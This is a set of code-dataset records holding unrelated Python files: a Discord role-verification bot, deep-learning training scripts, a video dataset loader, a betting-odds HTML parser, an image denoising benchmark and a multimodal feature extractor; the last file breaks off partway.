+{"seq_id":"232643638","text":"import re\n\nimport sys\nsys.path.append(\"..\")\nsys.path.append(\"../..\")\n\nimport DGUtils\n\npath = \"SetFile/eg.xls\"\n\nlist01 = DGUtils.read_excel(path)\n# listStr = str(list01)\n\n# list02 = listStr.split(\"活动\")\n\nfor i in range(0,len(list01)):\n    # list01[i] = re.sub(r'活动[0-9]+',\"分割线\",str(list01[i]))\n    if len(re.findall(r'活动[0-9]+',str(list01[i]))) > 0:\n        list01.insert(i, \"==================\") \n\n    \n    # print(i)\n# list02 = re.split(\"分割线\", str(list01))\n# for i in list02:\n#     print(i)\n\nfor i in list01:\n    print(i)","sub_path":"DGame/StartServerTimeDemo02/Code/demo_01.py","file_name":"demo_01.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"437451789","text":"import discord\nfrom checker import check\nfrom discordvars import guild, verify, role1, role2, log\n\nf = open(\"token.txt\", \"r\")\ntoken = f.readline()\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n    print(\"Logged in as:\", client.user)\n\n@client.event\nasync def on_message(message):\n    server = client.get_guild(guild)  # renamed from guild: a local named guild would shadow the imported id and raise UnboundLocalError\n    if message.author != client.user:\n        if message.channel.id == verify:\n            print(message.content)\n            splitter = message.content.split()\n            roll = splitter[-1]\n            name = \" \".join(splitter[:-1])\n            channel = client.get_channel(log)\n            if check(name, roll):\n                await channel.send(f\"Name: {name}\\nRoll:{roll}\\nRegistered!\\nReference User: <@{message.author.id}>\")\n                await message.author.add_roles(server.get_role(role1))\n                await message.author.add_roles(server.get_role(role2))\n            else:\n                await channel.send(f\"Name: `{name}` and Roll: `{roll}` unmatched\\nReference User: <@{message.author.id}>\")\n            await message.delete()\n\nclient.run(token)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"311821084","text":"import os\nimport random\nfrom abc import ABC, abstractmethod\n\nimport numpy as np\n\nimport torch.utils.data as data\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\nfrom core.dataset.base_dataset import BaseDataset\nfrom core.dataset.functionals.frame_loaders import 
(\n\tVideoMetadata,\n\tgenerate_video_indices,\n\tload_video_frames\n)\nfrom core.dataset.functionals import (\n\tcheck_filepath,\n\tread_strip_split_lines\n)\nfrom core.dataset.functionals.transforms import get_transform\n\n\nclass TemporalDataset(BaseDataset):\n\t\"\"\"Temporal (action) dataset\n\n\tTemporal dataset from video frames which support loading data from pre-processed video frames.\n\tTemporal dataset has new channel length that comes from stacking images ordered chronogically.\n\tThe channel axis represent time series.\n\n\tTemporal action frames initially take image of extension .jpg, .png, .jpeg, etc. \n\tThey represent frames taken from video.\n\t\n\tThe metadata for this dataset, also called split file, contains three columns:\n\t\t... folder path, num_frames, and labels\n\t\"\"\"\n\n\tdef __init__(self, opts, phase='train'):\n\t\t\"\"\"Initialize the class; save the options in the class\n\n\t\tParameters:\n\t\t\topts (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions\n\t\t\tphase (str)-- specify if this dataset loader is used for [train | val | test]\n\t\t\"\"\"\n\t\tself.opts = opts\n\t\tself.phase = phase\n\t\tself.configure_dataset_settings(opts)\n\t\tself.setup_metadata(opts)\n\n\t\t# configure image property\n\t\tself.group_transforms = get_transform(opts)\n\n\tdef configure_dataset_settings(self, opts):\n\t\t# Configs for input video\n\t\tself.modality = opts.modality\n\t\tself.n_segments = opts.n_segments\t\t\t# segment video to n_segment\n\t\tself.sample_length = opts.sample_length\t\t# sample length per segment\n\t\tself.random_shift = opts.random_shift\n\n\t\t# Configs for image file naming\n\t\tself.image_extension = opts.img_ext\n\n\t\tif self.modality in ['RGB', 'RGBDiff', 'ARP']:\n\t\t\tself.img_name_tmpl = self.modality.lower() + '_{:05d}' + self.image_extension\n\t\telif self.modality == 'Flow':\n\t\t\tself.img_name_tmpl = self.modality.lower() + '_{}_' + '_{:05d}' + self.image_extension\n\t\telse:\n\t\t\traise NotImplementedError(\n\t\t\t\t'Unsupported Modality for Temporal Dataset. '\n\t\t\t\t'Please implement for specified modality: %s' % self.modality\n\t\t\t)\n\n\tdef setup_metadata(self, opts):\n\t\tsuper(TemporalDataset, self).setup_metadata(opts)\n\n\t\t# Parse and map metadata to VideoMetadata (named_tuple)\n\t\tself.video_metadata_list = [\n\t\t\tVideoMetadata(directory, label, self.modality)\n\t\t\tfor directory, label in self.metadata_list\n\t\t]\n\t\treturn self.video_metadata_list\n\n\t@staticmethod\n\tdef modify_cli_options(parser, is_train):\n\t\tparser.add_argument('--modality', type=str, default='RGB',\n\t\t\thelp='Chooses modality for intended dataset. 
[RGB | RGBDiff | Flow | ARP]')\n\t\tparser.add_argument('--n_segments', type=int, default=3,\n\t\t\thelp='Number of video segments.')\n\t\tparser.add_argument('--sample_length', type=int, default=5,\n\t\t\thelp='Number of frames to be sampled in each segment')\n\t\tparser.add_argument('--random_shift', action='store_true',\n\t\t\thelp='Whether to sample video frames at random shift or at the middle of each segment')\n\n\t\treturn parser\n\n\tdef __getitem__(self, index):\n\t\tmetadata = self.video_metadata_list[index]\n\t\tdirectory = metadata.directory\t\t# directory of video frames (single dataset)\n\t\tn_frames = metadata.n_frames\t\t# number of frames in directory having same modality\n\t\tlabel = metadata.label\t\t\t\t# class label\n\n\t\tframe_indices = generate_video_indices(\n\t\t\tself.n_segments, n_frames,\n\t\t\tself.sample_length, self.random_shift)\n\n\t\t# iterate frame_generator to get frames and respective label\n\t\timgs = list(\n\t\t\tload_video_frames(frame_indices, directory,\n\t\t\t\tself.img_name_tmpl, self.modality)\n\t\t)\n\t\tprint(len(imgs), n_frames)\n\t\timgs = self.group_transforms(imgs)\n\n\t\treturn imgs, label\n\n","sub_path":"core/dataset/temporal_dataset.py","file_name":"temporal_dataset.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"548058635","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom matplotlib import pyplot as plt\n\n# The following lines adjust the granularity of reporting. \npd.options.display.max_rows = 10\npd.options.display.float_format = \"{:.3f}\".format\n\n# The following line improves formatting when outputting NumPy arrays.\nnp.set_printoptions(linewidth = 200)\n\n# Load the dataset\n(x_train, y_train),(x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\n\n# Output example #2917 of the training set.\n#print(x_train[2917])\n\n# Use false colors to visualize the array.\n#plt.imshow(x_train[2917])\n#plt.show()\n\n# Output row #10 of example #2917.\n#print(x_train[2917][10])\n\n# Output pixel #16 of row #10 of example #2917.\n#x_train[2917][10][16]\n\n\n# Normalize feature values.\nx_train_normalized = x_train / 255.0\nx_test_normalized = x_test / 255.0\n\n# Define the plotting function\ndef plot_curve(epochs, hist, list_of_metrics):\n    # list_of_metrics should be one of the names shown in:\n    # https://www.tensorflow.org/tutorials/structured_data/imbalanced_data#define_the_model_and_metrics\n    plt.figure()\n    plt.xlabel(\"Epoch\")\n    plt.ylabel(\"Value\")\n\n    for m in list_of_metrics:\n        x = hist[m]\n        plt.plot(epochs[1:], x[1:], label = m)\n\n    plt.legend()\n    plt.show()\n\n\n\"\"\" Create and train the model. ------------------------------------------------------------------- \"\"\"\n# Create a deep neural net model\ndef create_model(my_learning_rate):\n    model = tf.keras.models.Sequential()\n\n    # The features are stored in a two-dimensional 28X28 array. Flatten that two-dimensional array into a one-dimensional\n    # 784-element array.\n    model.add(tf.keras.layers.Flatten(input_shape=(28, 28)))\n\n    # Define the first hidden layer.\n    model.add(tf.keras.layers.Dense(units = 256, activation = \"relu\"))\n\n    # Define a dropout regularization layer.\n    model.add(tf.keras.layers.Dropout(rate = 0.2))\n\n    # Define the second hidden layer.\n    model.add(tf.keras.layers.Dense(units = 128, activation = \"relu\"))\n\n    # Define the output layer. 
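The softmax activation converts the layer's raw outputs into a probability distribution over the classes. 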
The units parameter is set to 10 because the model must choose among 10 possible output values (representing\n    # the digits from 0 to 9, inclusive).\n    model.add(tf.keras.layers.Dense(units = 10, activation = \"softmax\"))\n\n    # Notice that the loss function for multi-class classification is different than the loss function for binary classification.\n    model.compile(optimizer = tf.keras.optimizers.Adam(lr = my_learning_rate),\n                  loss = \"sparse_categorical_crossentropy\",\n                  metrics = [\"accuracy\"])\n    \n    return model\n\n# Train the model\ndef train_model(model, train_features, train_label, epochs, batch_size = None, validation_split = 0.1):\n    history = model.fit(x = train_features, y = train_label, epochs = epochs, batch_size = batch_size, shuffle = True,\n                        validation_split = validation_split)\n\n    epochs = history.epoch\n    hist = pd.DataFrame(history.history)\n\n    return epochs, hist\n\n\"\"\" Invoke the previous functions. --------------------------------------------------------------- \"\"\"\nlearning_rate = 0.003\nepochs = 50\nbatch_size = 4000\nvalidation_split = 0.2\n\n# Establish the model's topography.\nmy_model = create_model(learning_rate)\n\n# Train the model on the normalized training set.\nepochs, hist = train_model(my_model, x_train_normalized, y_train, epochs, batch_size, validation_split)\n\n# Plot a graph of the metric vs. epochs.\nlist_of_metrics_to_plot = [\"accuracy\"]\nplot_curve(epochs, hist, list_of_metrics_to_plot)\n\n# Evaluate the model against the test set.\nmy_model.evaluate(x = x_test_normalized, y = y_test, batch_size = batch_size)\n\n\n\n\n\n","sub_path":"01_Courses/01_Crash_Course/09_multi-class_classification_MNIST.py","file_name":"09_multi-class_classification_MNIST.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"112619988","text":"# python train_vgg.py --dataset_2 train_data --modelsaved output/smallvggnet.modelsaved --label-bin output/smallvggnet_lb.pickle --plot output/smallvggnet_plot.png\n# PyImage/tutorial/train_vgg.py\nimport matplotlib\nmatplotlib.use(\"Agg\") # set the matplotlib backend so figures can be saved in the background\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import SGD\nfrom imutils import paths\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport pickle\nimport cv2\nimport os\nfrom .pyimagesearch.smallvggnet import SmallVGGNet\nfrom .constants import *\n\ndata = []\nlabels = []\n\n# grab the image paths and shuffle them randomly\nimagePaths = sorted(list(paths.list_images(FLG.TRAIN_DATA_PATH)))\nrandom.seed(42)\nrandom.shuffle(imagePaths)\n\n# loop over the input test_data\nfor imagePath in imagePaths:\n    # load the image, resize it to 64x64 pixels (the required input spatial dimensions of SmallVGGNet), and store the image in the data list\n    image = cv2.imread(imagePath)\n    image = cv2.resize(image, (64, 64))\n    data.append(image)\n\n    # extract the class label from the image path and update the labels list\n    label = imagePath.split(os.path.sep)[-2]\n    labels.append(label)\n\n# scale the raw pixel intensities to the range [0, 1]\ndata = np.array(data, dtype=\"float\") / 255.0\nlabels = np.array(labels)\n\n(trainX, testX, trainY, testY) = train_test_split(data, labels, test_size=0.25, random_state=42)\n\n# convert the labels from integers to vectors (for 
2-class, binary classification you should use Keras' to_categorical function instead as the scikit-learn's LabelBinarizer will not return a vector)\nlb = LabelBinarizer()\ntrainY = lb.fit_transform(trainY)\ntestY = lb.transform(testY)\n\n# construct the image generator for data augmentation\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1, height_shift_range=0.1, shear_range=0.2, zoom_range=0.2, horizontal_flip=True, fill_mode=\"nearest\")\n\n# initialize our VGG-like Convolutional Neural Network\nmodel = SmallVGGNet.build(width=64, height=64, depth=3, classes=len(lb.classes_))\n\n\n# initialize the model and optimizer (you'll want to use binary_crossentropy for 2-class classification)\nprint(\"[INFO] training network...\")\nopt = SGD(lr=FLG.INIT_LR, decay=FLG.INIT_LR / FLG.EPOCHS)\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n\n# train the network\nH = model.fit_generator(aug.flow(trainX, trainY,\n\t\t\t\t\t\t\t\t batch_size=FLG.BATCH_SIZE),\n\t\t\t\t\t\tvalidation_data=(testX, testY),\n\t\t\t\t\t\tsteps_per_epoch=len(trainX) // FLG.BATCH_SIZE,\n\t\t\t\t\t\tepochs=FLG.EPOCHS)\n\n# evaluate the network\nprint(\"[INFO] evaluating network...\")\npredictions = model.predict(testX, batch_size=32)\nprint(classification_report(testY.argmax(axis=1), predictions.argmax(axis=1), target_names=lb.classes_))\n\n# plot the training loss and accuracy\nN = np.arange(0, FLG.EPOCHS)\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(N, H.history[\"loss\"], label=\"train_loss\")\nplt.plot(N, H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(N, H.history[\"acc\"], label=\"train_acc\")\nplt.plot(N, H.history[\"val_acc\"], label=\"val_acc\")\nplt.title(\"Training Loss and Accuracy (SmallVGGNet)\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.savefig(FLG.PLOT_VGG)\n\n# save the model and label binarizer to disk\nprint(\"[INFO] serializing network and label binarizer...\")\nmodel.save(FLG.MODEL_VGG)\nf = open(FLG.LANEL_BIN_VGG, \"wb\")\nf.write(pickle.dumps(lb))\nf.close()","sub_path":"Examples/SampleNet/train_vgg.py","file_name":"train_vgg.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"649693806","text":"import scrapy\nfrom bs4 import BeautifulSoup\nfrom classes import Odds\nfrom mlbMethods import convertTeamName\n\ndef getOdds(file):\n    f = open(file, \"r\")\n\n    if (file == \"P:/DFS_mlbData/VegasOdds/06-04-2019_odds.html\"):\n        print (\"Data is fucked: \" + file)\n        return ([])\n\n    # makes a data structure for html page using Beautifulsoup library\n    soup = BeautifulSoup(f.read(), 'html.parser')\n\n    # narrows the html down to just the table tag\n    table = soup.table\n\n    # creates 2 arrays with all the relevant rows\n    try:\n        rows1 = table.find_all(class_=\"statistics_table_alternateRow\")\n    except AttributeError:\n        print (\"Data is Fucked: \" + file)\n        return ([])\n    rows2 = table.find_all(class_=\"statistics_table_row\")\n\n    # creates a list - each entry contains 2 lines like Miami Marlins (that is one of the lines) - the 2 entries are the matchup\n    teams = []\n    for rows in rows1:\n        teams.append(rows.find_all(class_=\"oddsTeamWLink\"))\n    for rows in rows2:\n        teams.append(rows.find_all(class_=\"oddsTeamWLink\"))\n\n    # for each individual element (two lines), it looks at each individual line. 
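(Each element is the pair of team links pulled from one table row.) 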
Creates an Odds object and adds the teams (not actually based on who is favored yet), then puts each Odds object into an array.\n    # the array matches will contain an array of Odds objects that represent each match for the day\n    matches = []\n    for matchups in teams:\n        tempOdds = Odds()\n        for a in matchups:\n            if (('fav' in tempOdds)):\n                tempOdds['dog'] = convertTeamName(a.string)\n            else:\n                tempOdds['fav'] = convertTeamName(a.string)\n        matches.append(tempOdds)\n\n    # creates an array with every element being another array (representing a matchup) containing the money line and total\n    oddsList = []\n    for rows in rows1:\n        oddsList.append(rows.find_all(class_=\"alignRight bookColumn\")[3].contents)\n    for rows in rows2:\n        oddsList.append(rows.find_all(class_=\"alignRight bookColumn\")[3].contents)\n\n    count = 0\n    for matchups in oddsList:\n        # try/except now sits inside the loop so a \"PK\" (pick'em) line no longer aborts the remaining matchups\n        try:\n            if (float(matchups[0].string) < 0):\n                matches[count]['ml'] = int(matchups[0].string)\n                matches[count]['ou'] = float(matchups[1].string)\n            else:\n                temp = matches[count]['fav']\n                matches[count]['fav'] = matches[count]['dog']\n                matches[count]['dog'] = temp\n                matches[count]['ml'] = int(matchups[1].string)\n                matches[count]['ou'] = float(matchups[0].string)\n        except ValueError:\n            if (matchups[0].string == \"PK\"):\n                matches[count]['ml'] = -100\n                matches[count]['ou'] = float(matchups[1].string)\n            else:\n                matches[count]['ml'] = \"N/A\"\n                matches[count]['ou'] = \"N/A\"\n        count = count + 1\n    return (matches)\n","sub_path":"Parsers/OddsParser.py","file_name":"OddsParser.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"235322689","text":"'''\n2021.02.22\nImplementation of salt-and-pepper noise removal algorithms\nMF: opencv api\nAMF: implements Step 1 of NAMF (Python port of the paper's code)\nNAMF: Step 1 + Step 2 of the NAMF paper (Python port of the paper's code)\nProposed1 : AMF + distance-based weighted sum\nProposed2 : Proposed1 + bilateral\nProposed3 : NAMF + distance-based weighted sum + bilateral\nProposed4 : Proposed3 + includes the center pixel's own weight\nProposed5 : Proposed1 + pixel-reliability weighted average\n'''\nimport cv2\n\nimport implemetation_bykim as imp_bykim\n\nif __name__ == '__main__':\n\n    #First, generate and save noisy images at various noise levels, so every run sees identical inputs (rand would otherwise give different results each time)-------\n    #generation_noise_images()\n    #--------------------------------------------------------------------------------------------------------------\n\n    #Load the image (tested with a small matrix (4x3) first)\n    # img = np.arange(0,12).reshape(3,4)\n\n    originimages = []  # all test images\n    for i in range(1, 53):\n        fname = \"testset/[test{0:02d}]_origin.bmp\".format(i)\n        originimages.append(fname)\n    # print(filenames)\n\n\n    noiseimages = []  # all test images\n    noise_probs = [0.1, 0.3, 0.5, 0.7, 0.9]\n    for i in range(1, 53):\n        for noise_prob in noise_probs:\n            fname = \"noiseimage/[test{0:02d}]_origin_{1:.2f}.png\".format(i, noise_prob)\n            noiseimages.append(fname)\n    print(len(noiseimages))\n\n    # img = cv2.imread('testset/[test01]_origin.bmp', cv2.IMREAD_GRAYSCALE)\n\n\n    f = open('psnrs.csv','w')\n    f.write(\"image, mf,amf,namf,proposed1,proposed2,proposed3,proposed4,proposed5\\n\")\n\n    for num in range(0,260):\n\n        img = cv2.imread(originimages[num//5], cv2.IMREAD_GRAYSCALE)\n        # cv2.namedWindow('original img', cv2.WINDOW_NORMAL)\n        # cv2.imshow('original img', img)\n        # cv2.waitKey(0)\n\n        #noisy_img=sp_noise(img, 0.6)\n\n        #noisy_img=sp_noise_to_file(img, 0.6, '[test01]_origin')\n        noisy_img = cv2.imread(noiseimages[num], cv2.IMREAD_GRAYSCALE)\n        noisy_img_clone = noisy_img.copy()\n\n        # Save PSNR for the 4 methods (mf, amf, namf, bilateral) to a file\n        # print(\"noisy_img PSNR = {0:.3f}\".format(cv2.PSNR(img, noisy_img)))\n        # restored_image0 = cv2.medianBlur(noisy_img, 3)\n        # print(\"restored_image0 (mf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image0)))\n        # restored_image1, restored_image2, restored_image3 = amf(noisy_img, 2, 20, 0.8)\n        # print(\"restored_image1 (amf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image1)))\n        # print(\"restored_image2 (namf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image2)))\n        # print(\"restored_image3 (+bilateral) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image3)))\n\n        # amf, namf, proposed = imp_bykim.amf(noisy_img, 2, 20, 0.8)\n        # print(\"amf (amf) PSNR = {0:.3f}\".format(cv2.PSNR(img, amf)))\n        # print(\"namf (namf) PSNR = {0:.3f}\".format(cv2.PSNR(img, namf)))\n        # print(\"proposed (proposed) PSNR = {0:.3f}\".format(cv2.PSNR(img, proposed)))\n\n        #Compute the PSNRs (noisy_img is modified inside the filter functions, so restore it from the clone before each call)\n\n        mf_byopencv=cv2.medianBlur(noisy_img, 3)\n        mf_byopencv_psnr=cv2.PSNR(img, mf_byopencv)\n        print(\"mf_byopencv (mf) PSNR = {0:.3f}\".format(mf_byopencv_psnr))\n        noisy_img=noisy_img_clone.copy()\n        amf_bykim = imp_bykim.amf_bykim(noisy_img, 2, 20, 0.8)\n        amf_bykim_psnr=cv2.PSNR(img, amf_bykim)\n        print(\"amf_bykim (amf) PSNR = {0:.3f}\".format(amf_bykim_psnr))\n        noisy_img = noisy_img_clone.copy()\n        namf_bykim=imp_bykim.namf_bykim(noisy_img, 2, 20, 0.8)\n        namf_bykim_psnr=cv2.PSNR(img, namf_bykim)\n        print(\"namf_bykim (namf) PSNR = {0:.3f}\".format(namf_bykim_psnr))\n        noisy_img = noisy_img_clone.copy()\n        proposed1_bykim=imp_bykim.proposed1_bykim(noisy_img, 2, 20, 0.8)\n        proposed1_bykim_psnr=cv2.PSNR(img, proposed1_bykim)\n        print(\"proposed1_bykim (#amf+거리 기반 weighted sum) PSNR = {0:.3f}\".format(proposed1_bykim_psnr))\n        noisy_img = noisy_img_clone.copy()\n        proposed2_bykim=imp_bykim.proposed2_bykim(noisy_img, 2, 20, 0.8)\n        proposed2_bykim_psnr = cv2.PSNR(img, proposed2_bykim)\n        print(\"proposed2_bykim (#proposed1 + bilateral) PSNR = {0:.3f}\".format(proposed2_bykim_psnr))\n        noisy_img = noisy_img_clone.copy()\n        proposed3_bykim=imp_bykim.proposed3_bykim(noisy_img, 2, 20, 0.8)\n        proposed3_bykim_psnr = cv2.PSNR(img, proposed3_bykim)\n        print(\"proposed3_bykim (#namf + 거리 기반 weighted sum + bilateral) PSNR = {0:.3f}\".format(proposed3_bykim_psnr))\n        noisy_img = noisy_img_clone.copy()\n        proposed4_bykim = imp_bykim.proposed4_bykim(noisy_img, 2, 20, 0.8)\n        proposed4_bykim_psnr = cv2.PSNR(img, proposed4_bykim)\n        print(\"proposed4_bykim ( #proposed3 + 자신 weight 포함) PSNR = {0:.3f}\".format(proposed4_bykim_psnr))\n        noisy_img = noisy_img_clone.copy()\n        proposed5_bykim = imp_bykim.proposed5_bykim(noisy_img, 2, 20, 0.8)\n        proposed5_bykim_psnr = cv2.PSNR(img, proposed5_bykim)\n        print(\"proposed5_bykim (#proposed1 + pixel 신뢰도 weight average) PSNR = {0:.3f}\".format(proposed5_bykim_psnr))\n\n        #save the PSNRs to the csv file\n        f.write(\"{8},{0:.3f},{1:.3f},{2:.3f},{3:.3f},{4:.3f},{5:.3f},{6:.3f},{7:.3f}\\n\".format(mf_byopencv_psnr,amf_bykim_psnr,namf_bykim_psnr,proposed1_bykim_psnr,proposed2_bykim_psnr,proposed3_bykim_psnr,proposed4_bykim_psnr,proposed5_bykim_psnr,noiseimages[num]))\n\n        '''\n        # Show the images one at a time, in order\n        cv2.namedWindow('noisy image', cv2.WINDOW_NORMAL)\n        cv2.imshow('noisy image', noisy_img)\n        print(\"noisy_img PSNR = {0:.3f}\".format(cv2.PSNR(img, noisy_img)))\n        cv2.waitKey(0)\n\n        restored_image0=cv2.medianBlur(noisy_img,3)\n        cv2.namedWindow('restored_image0 (mf)', cv2.WINDOW_NORMAL)\n        cv2.imshow('restored_image0 (mf)', restored_image0)\n        print(\"restored_image0 (mf) PSNR = {0:.3f}\".format(cv2.PSNR(img, 
restored_image0)))\n cv2.waitKey(0)\n\n restored_image1, restored_image2, restored_image3 = amf(noisy_img, 2, 20, 0.8)\n\n cv2.namedWindow('restored_image1 (amf)', cv2.WINDOW_NORMAL)\n cv2.imshow('restored_image1 (amf)', restored_image1)\n print(\"restored_image1 (amf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image1)))\n cv2.waitKey(0)\n\n cv2.namedWindow('restored_image2 (namf)', cv2.WINDOW_NORMAL)\n cv2.imshow('restored_image2 (namf)', restored_image2)\n print(\"restored_image2 (namf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image2)))\n cv2.waitKey(0)\n\n #restored_image3=cv2.bilateralFilter(restored_image2, 5, 10, 10)\n cv2.namedWindow('restored_image3 (+bilateral)', cv2.WINDOW_NORMAL)\n cv2.imshow('restored_image3 (+bilateral)', restored_image3)\n print(\"restored_image3 (+bilateral) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image3)))\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n '''\n\n f.close()\n","sub_path":"main_old.py","file_name":"main_old.py","file_ext":"py","file_size_in_byte":7165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"288742833","text":"from __future__ import unicode_literals\r\nimport sys, os\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\nimport tensorflow as tf\r\nimport json\r\n\r\nfrom src.feats_extract.imgfeat_extractor.youtube8M_extractor import YouTube8MFeatureExtractor\r\nfrom src.feats_extract.imgfeat_extractor.finetuned_resnet101 import FinetunedResnet101Extractor\r\nfrom src.feats_extract.txt_extractor.text_requests import VideoASR, VideoOCR, ImageOCR\r\nfrom src.feats_extract.audio_extractor import vggish_input, vggish_params, vggish_postprocess, vggish_slim\r\n\r\n\r\nFRAMES_PER_SECOND = 1\r\nPCA_PARAMS = \"pretrained/vggfish/vggish_pca_params.npz\" # 'Path to the VGGish PCA parameters file.'\r\nVGGISH_CHECKPOINT = 'pretrained/vggfish/vggish_model.ckpt'\r\nCAP_PROP_POS_MSEC = 0\r\n\r\n\r\nclass MultiModalFeatureExtract(object):\r\n \"\"\"docstring for ClassName\"\"\"\r\n\r\n def __init__(self, batch_size=1,\r\n imgfeat_extractor='Youtube8M',\r\n data_aug=False,\r\n extract_video=True,\r\n extract_audio=True,\r\n extract_text=True):\r\n super(MultiModalFeatureExtract, self).__init__()\r\n self.extract_video = extract_video\r\n self.extract_audio = extract_audio\r\n self.extract_text = extract_text\r\n self.data_aug = data_aug\r\n\r\n # Video Extract\r\n if extract_video:\r\n self.batch_size = batch_size\r\n if imgfeat_extractor == 'Youtube8M':\r\n self.extractor = YouTube8MFeatureExtractor(use_batch=batch_size != 1)\r\n elif imgfeat_extractor == 'FinetunedResnet101':\r\n self.extractor = FinetunedResnet101Extractor()\r\n elif imgfeat_extractor == 'InceptionResnetV2':\r\n from src.feats_extract.imgfeat_extractor.inception_resnet_v2 import InceptionResnetV2Extractor\r\n self.extractor = InceptionResnetV2Extractor()\r\n elif imgfeat_extractor == 'vit':\r\n from src.feats_extract.imgfeat_extractor.video_transformer import VideoTransformerExtractor\r\n self.extractor = VideoTransformerExtractor()\r\n else:\r\n raise NotImplementedError(imgfeat_extractor)\r\n\r\n if extract_audio:\r\n self.pproc = vggish_postprocess.Postprocessor(PCA_PARAMS) # audio pca\r\n self.audio_graph = tf.Graph()\r\n config = tf.ConfigProto(allow_soft_placement=True,\r\n log_device_placement=True)\r\n config.gpu_options.allow_growth = True\r\n with self.audio_graph.as_default():\r\n # 音频\r\n self.audio_sess = tf.Session(graph=self.audio_graph, config=config)\r\n 
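# The next two calls build the frozen VGGish graph and restore its checkpoint weights into this session.\r\n                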
vggish_slim.define_vggish_slim(training=False)\r\n vggish_slim.load_vggish_slim_checkpoint(self.audio_sess, VGGISH_CHECKPOINT)\r\n self.features_tensor = self.audio_sess.graph.get_tensor_by_name(\r\n vggish_params.INPUT_TENSOR_NAME)\r\n self.embedding_tensor = self.audio_sess.graph.get_tensor_by_name(\r\n vggish_params.OUTPUT_TENSOR_NAME)\r\n\r\n if extract_text:\r\n self.video_ocr_extractor = VideoOCR()\r\n self.video_asr_extractor = VideoASR()\r\n self.image_ocr_extractor = ImageOCR()\r\n\r\n def frame_iterator(self, filename, every_ms=1000, max_num_frames=300):\r\n \"\"\"Uses OpenCV to iterate over all frames of filename at a given frequency.\r\n\r\n Args:\r\n filename: Path to video file (e.g. mp4)\r\n every_ms: The duration (in milliseconds) to skip between frames.\r\n max_num_frames: Maximum number of frames to process, taken from the\r\n beginning of the video.\r\n\r\n Yields:\r\n RGB frame with shape (image height, image width, channels)\r\n \"\"\"\r\n video_capture = cv2.VideoCapture()\r\n if not video_capture.open(filename):\r\n print(sys.stderr, 'Error: Cannot open video file ' + filename)\r\n return\r\n last_ts = -99999 # The timestamp of last retrieved frame.\r\n num_retrieved = 0\r\n\r\n while num_retrieved < max_num_frames:\r\n # Skip frames\r\n while video_capture.get(CAP_PROP_POS_MSEC) < every_ms + last_ts:\r\n if not video_capture.read()[0]:\r\n return\r\n\r\n last_ts = video_capture.get(CAP_PROP_POS_MSEC)\r\n has_frames, frame = video_capture.read()\r\n if not has_frames:\r\n break\r\n yield frame\r\n num_retrieved += 1\r\n\r\n def frame_iterator_list(self, filename, every_ms=1000, max_num_frames=300):\r\n video_capture = cv2.VideoCapture()\r\n if not video_capture.open(filename):\r\n print(sys.stderr, 'Error: Cannot open video file ' + filename)\r\n return\r\n last_ts = -99999 # The timestamp of last retrieved frame.\r\n num_retrieved = 0\r\n\r\n frame_all = []\r\n while num_retrieved < max_num_frames:\r\n # Skip frames\r\n while video_capture.get(CAP_PROP_POS_MSEC) < every_ms + last_ts:\r\n if not video_capture.read()[0]:\r\n return frame_all\r\n\r\n last_ts = video_capture.get(CAP_PROP_POS_MSEC)\r\n has_frames, frame = video_capture.read()\r\n if not has_frames:\r\n break\r\n frame_all.append(frame[:, :, ::-1])\r\n num_retrieved += 1\r\n\r\n return frame_all\r\n\r\n def extract_feat(self, test_file,\r\n frame_npy_path=None, audio_npy_path=None, txt_file_path=None,\r\n image_jpg_path=None, save=True):\r\n filetype = test_file.split('.')[-1]\r\n if filetype in ['mp4', 'avi']:\r\n feat_dict = self.extract_video_feat(test_file, frame_npy_path, audio_npy_path, txt_file_path,\r\n image_jpg_path, save)\r\n elif filetype in ['jpg', 'png']:\r\n feat_dict = self.extract_image_feat(test_file)\r\n else:\r\n raise NotImplementedError\r\n if save:\r\n if 'video' in feat_dict:\r\n np.save(frame_npy_path, feat_dict['video'])\r\n print('保存视频特征为{}'.format(frame_npy_path))\r\n if 'audio' in feat_dict:\r\n np.save(audio_npy_path, feat_dict['audio'])\r\n print('保存音频特征为{}'.format(audio_npy_path))\r\n if 'text' in feat_dict:\r\n with open(txt_file_path, 'w') as f:\r\n f.write(feat_dict['text'])\r\n 